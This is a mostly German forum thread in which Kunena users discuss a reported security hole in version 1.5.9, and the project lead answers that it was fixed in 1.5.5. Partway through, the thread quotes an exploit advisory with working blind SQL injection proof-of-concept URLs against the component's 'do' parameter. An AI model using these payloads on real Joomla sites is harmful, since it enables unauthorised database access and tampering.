Question [erledigt] Sicherheitsproblem in der neuen 1.5.9 Version ! ?

Hallo Kunenacommunity,

leider wurde ich heute im Joomlaportal.de auf eine Sicherheitslücke in der neuen Kunenaversion 1.5.9 aufmerksam gemacht ! :woohoo:

Was soll nun getan werden ?

Im Joomlaportalchat, wurde mir geraten das Forum zu Deaktivieren ! ? :S

Zur Zeit sichere ich gerade alles um eventuell die Version 1.5.8 wieder zu Instalieren!

Den Bericht könnt Ihr euch HIER einmal ansehen.

MfG, C.A.M .

Here the whole link: bit.ly/aNzk4q

autsch und das nachdem ich heut nacht geupdatet habe

This is relevant for all of kunena.
Can we maybe do this thread in english?

# Title: Joomla Component com_kunena Blind SQL Injection Vulnerability
# EDB-ID: 11279
# CVE-ID: ()
# OSVDB-ID: ()
# Author: B-HUNT3|2
# Published: 2010-01-28
# Verified: no
# Download Exploit Code
# Download N/A

[~]>> ...[BEGIN ADVISORY]...

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> TITLE: Joomla (com_kunena) BLIND SQL Injection Vulnerability
[~]>> LANGUAGE: PHP
[~]>> DORK: N/A
[~]>> RESEARCHER: B-HUNT3|2
[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com
[~]>> TESTED ON: LocalHost

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> DESCRIPTION: Input var do is vulnerable to SQL Code Injection
[~]>> AFFECTED VERSIONS: Confirmed in 1.5.9 but probably other versions also
[~]>> RISK: Medium/High
[~]>> IMPACT: Execute Arbitrary SQL queries

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> PROOF OF CONCEPT:

[~]>> http://[HOST]/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=[SQL]

[~]>> {RETURN TRUE::RETURN FALSE} ---> VIEW TIME RESPONSE ||| HIGH: TRUE ||| LOW: FALSE

[~]>> http://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=5,benchmark(999999,md5(@@version)),1)/*
[~]>> http://server/[JOOMLA_PATH]/index.php?option=com_kunena&Itemid=86&func=announcement&do=show', link='0wn3d', task='0wn3d' WHERE userid=62 AND 1=if(substring(@@version,1,1)=4,benchmark(999999,md5(@@version)),1)/*

[~]>> Note: There are more affected vars.

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

[~]>> ...[END ADVISORY]...

www.exploit-db.com/exploits/11279

Kann jemand mal BITTE diesen Buchstabensalat übersetzen. :S

Was ist da genau das Problem und wie soll nun vorgegangen werden?

Der eine meint das man besser das Forum Deaktivieren sollte, ein ander meint das es besser währe das Forum zu Deinstallieren und wieder ein anderer meint, Dont Panick !

Bei Sicherheits Geschichten gerate ich jedoch sehr schnell in Panik, auch wenn meine Seite noch nicht so viele Besucher täglich hat wie ich es gerne hätte, heist das ja noch lange nicht das es mich bei meinem Glück nicht treffen könnte. :blink:

Ich habe mein Forum erst einmal bis auf weiteres nur Deaktiviert, weil es bei einer Deinstallation meine Seite in eine Fehlermeldung vewandelt. Weshalb das so ist weis ich noch nicht. :woohoo:

MfG, C.A.M .

Hallo allerseits!

Wir sind gestern auf die vermeidliche Sicherheitsluecke aufmerksam gemacht worden.

Innerhalb von 2-3 Stunden haben wir 1.5.4 , 1.5.5, 1.5.6, 1.5.7, 1.5.8 & 1.5.9 gestsest.

Alle offiziellen Kunena versionen seit 1.5.5 haben den fix eingebaut. Wir haben sogar kunena.com mit der Attacke getestet.

Die Attacke funktioniert nur gegen alter Kunena 1.5.4 (und aelter aber wirklich gegen ALLE Fireboard Versionen).

Wir haben diesen Bug vor Monaten gefixed und mit 1.5.5 ausgeliefert.

1.5.9 hat dieses problem nicht.

Wir haben umgehend den Author des Alerts als auch packetstorm von diesen Fakten informiert, aber leider von niemandem eine Antwort bekommen.



Hi everybody,

We were made aware of this alleged security vulnerability within a few hours of it hitting packetstorm.

Within 2-3 hours we tested 1.5.4, 1.5.5, 1.5.6, 1.5.7, 1.5.8 and 1.5.9.

Every official distribution since 1.5.5 has the fix built in. We even ran the attack against kunena.com itself.

The vulnerability is only present in versions of Kunena 1.5.4 (and older and ALL versions of Fireboard)

We have fixed this old Fireboard issue months ago.

We immediately contacted the author of the alert as well as packetstorm but have not gotten a response from either one.


fxstein
Kunena project lead

Hallo fxstein,

das freut mich das dies ein Fehlalarm gewesen ist !

Da dies ja nun geklärt ist, können wir ja alle unser Forum wieder aktivieren und heute Abend wieder ruhig schlafen gehen.

Dennoch würde ich gerne wissen, was das für ein Fehler ist und was im schlimmsten Fall hätte passieren können.

VIELEN dank für die schnelle Entwarnung !

MfG, C.A.M .